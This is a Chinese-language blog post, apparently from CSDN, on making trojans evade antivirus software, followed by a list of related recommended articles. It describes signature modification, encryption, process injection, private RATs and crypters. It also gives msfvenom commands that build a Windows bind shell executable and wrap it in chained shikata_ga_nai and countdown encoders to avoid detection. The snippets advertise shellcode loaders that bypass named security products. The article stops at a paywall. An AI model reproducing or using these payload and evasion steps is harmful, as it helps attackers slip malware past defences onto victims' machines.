木马免杀(绕过杀软)

最新推荐文章于 2024-08-02 10:54:44 发布
最新推荐文章于 2024-08-02 10:54:44 发布
阅读量3.8k 收藏 49
点赞数 11
分类专栏: 网络安全 文章标签: shell metasploit linux 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43894771/article/details/104807676
版权

仅用于学习交流
免杀是一个渗透测试中最苦恼的环节,也是一个需要学习很久的部分。
利用kali生成的木马存在的问题就是无法避免市面上大多数的杀软,及时利用kali自带的免杀也无法达到很好的免杀效果。

免杀技术
1.修改二进制文件中的特征字符
替换、擦除、修改
2.加密技术
通过加密方式使得特征字符不可读,从而逃避杀软检测
运行时分片分段的解密执行,注入进程或杀软不检查的无害文件中
3.防杀软的检测
恶意程序本身的特征字符
加密器crypter的特征字符

当前的现状
1.编写私有的RAT软件,避免普遍杀软所知的特征字符
2.使用独有crypter软件加密恶意程序
3.尽可能小范围使用,避免被发现
4.直接修改特征码(最直接的方式)

常用的RAT软件
灰鸽子、波尔、黑暗彗星、潘多拉、NanoCore

生成反弹shell
msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -a x86 -platform win -f exe -o a.exe

加密编码反弹shell
msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/ countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/ shikata_ga_nai -i 9 -

最低0.47元/天 解锁文章
「已注销」
关注
  • 11
    点赞
  • 49
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【护网必备】Windows平台shellcode免杀加载器
Fly_鹏程万里
06-14 322
bypass:McAfee、金山(数字签名)、火绒、ESET、卡巴企业版(时间5s 抖动50 Sleep_mask)、360全家桶(物理机)、Norton(加白程序资源)、WDF(PC)、WDF(Server)、Symantec(加白程序资源)bypass:金山(数字签名)、火绒、ESET、360全家桶(物理机)、WDF(PC)、WDF(服务器提示复查(关云保护))、McAfee、Norton(加白程序资源)、卡巴企业版(时间5s 抖动50 Sleep_mask)必须使用Bof操作,shell运行就掉线。
简单免杀绕过和利用上线的 GoCS
HBohan的博客
08-23 806
前言: Goby 可以快速准确的扫描资产,并直观呈现出来。同时经过上次 EXP 计划过后,PoC&EXP 也增加了许多。在实战化漏洞扫描后,对于高危漏洞的利用,不仅仅只在 whoami 上,而是要进入后渗透阶段,那么对于 Windows 机器而言,上线 CS 是必不可少的操作,会让后渗透如鱼得水。此插件只运用了简单的利用方式上线 CS,希望师傅们能够提供想法和建议把它更为完善,源码中有详细的注释,可供师傅们快速理解。 0×01 插件使用 1.1 插件效果 1.2 使用方法 1.在工具栏导入 CS
木马核心技术剖析读书笔记之木马免杀
不急不躁
03-16 2274
免杀原理 基于特征码的检测 基于病毒特征码的检测方法,是目前反病毒软件最常用的检测技术。经过长时间的收集与积累,反病毒软件建立了庞大的已知病毒的特征数据库。在对可疑软件进行检测时,会从特征数据库中匹配已有特征。这种方法相对比较准确、快速,而且可以很容易地通过快速分析,结合新的模板,添加新的病毒文件特征。 特征码可以是一个简单的字符串或者代码字节序列,也可以是包含了已知恶意文件各项特点的...
木马免杀方式
Shinyhuang_的博客
01-05 6451
前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。 1、裸
【网络安全木马免杀方式——加壳免杀
最新发布
weixin_42340783的博客
08-02 1613
免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。
木马免杀
一纸荒芜的博客
08-03 2964
木马免杀
木马免杀全攻略
tony的专栏
10-25 2102
木马免杀全攻略[续](图) 大家好,很高兴又与大家见面了,不知道大家对上期的文章是否满意,但是木马免杀很多啊!可是我只介绍了可执行文件木马免杀这一种,而关于脚本木马免杀只字未提,真是惭愧……'j6S-U1q:s5l在这篇文章里我会尽量补充上篇文章的不足,系统地介绍一下脚本木马免杀方法。$K0N4L'V z%s2Z关于脚本木马的查杀原理与可执行文件木马大体相同,所以在这里就不再介绍杀毒软件
木马免杀原理及方法(超全)
热门推荐
zhangnn5的专栏
05-22 1万+
灰鸽子免杀<br />概况   免杀意为免除被杀毒软件杀掉的软件。   灰鸽子免杀简介:本工具为纯绿色工具,软件采用独特的查杀技巧可完全查杀灰鸽子全系列(VIP2005、vip2006、免杀处理)木马,本软件已经过严格测试,备用本工具可以让您免受灰鸽子木马的困饶.更新内容:软件增加在线更新功能,增加对VIP2006系列及免杀处理的鸽子的查杀。 编辑本段原理解析灰鸽子免杀原理免杀技术全揭密   一.关于免杀的来源   为了让我们的木马在各种杀毒软件的威胁下活的更久.   二.什么叫免杀和查杀   可分为
木马免杀基础学习
fa1lr4in的小博客
07-13 894
参考书籍:《木马攻防全攻略》 --万立夫编著 --电脑报电子音像出版社 参考链接:https://www.52pojie.cn/thread-32064-1-1.html 推荐的免杀思路链接:http://www.cnhonkerarmy.com/thread-187791-1-1.html http://www.cnhonkerarmy.com/forum.php?fromuid=...
一句话木马以及免杀
抚琴
01-08 3917
此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础 查杀软件我首先:D盾 『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器安全的理念而设计!限制了
木马免杀原理详解
12-12
通过对木马免杀原理及其操作步骤的详细介绍,我们可以更全面地理解攻击者是如何绕过杀毒软件的防护措施的。这对于开发更加高效的安全防护策略具有重要意义。然而,值得注意的是,这些技术不应被用于非法目的,而是...
利用msfvenom生成混淆木马绕过杀软检测
# 1. 简介 ## 1.1 木马安全软件检测 随着互联网的快速发展,计算机安全问题变得越来越重要。恶意软件(malware)作为计算机安全领域中的一种主要威胁,其中木马...为了绕过安全软件的检测,黑客们进行了混淆木马
木马免杀技术
晓夜璨丰
06-04 780
木马免杀,在国内应该起源于05年吧.从那时单一特征码到现在复合特征码,杀毒软件从无主动防御到有主动防御.免杀技术越来越难.但是万变不离其宗--改特征码.到现在一些辅助软件的行为查杀. 以下讲解都是以远程控制软件为例(这里补充一个概念,木马的反弹技术,就是服务端主动连接客户端.何谓主动连接呢,你只要把客户端软件在本机上开启后,中马的机子会主动连接上你的那个软件,而不必你去找他的IP,再与他连接
浅谈木马免杀(一)
谢公子的博客
04-27 5632
免杀 免杀技术全称为反杀毒技术Anti Anti- Virus(AV)简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。 在实际的渗透过程中,目标机器上一般会有杀毒软件。如Windows Defender、360安全卫士、腾讯电脑管家...
【渗透实战】木马免杀
Python_0011的博客
04-14 1298
base64 sgn编码。
052 木马免杀全攻略
hackdoors的博客
10-06 3834
木马免杀全攻略 转载自:a1pass.blog.163.com 2007-12-07 14:02:24| 分类: 思绪燃星火——技 | 标签:黑客 杂志刊物 作者:A1Pass 出处:http://a1pass.blog.163.com/ 本文发表于07年第7期《黑客X档案》,与原文有少许出入。 转载请注明版权:http://a1pass.blog.163.com/ A1Pass的博客 黑...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值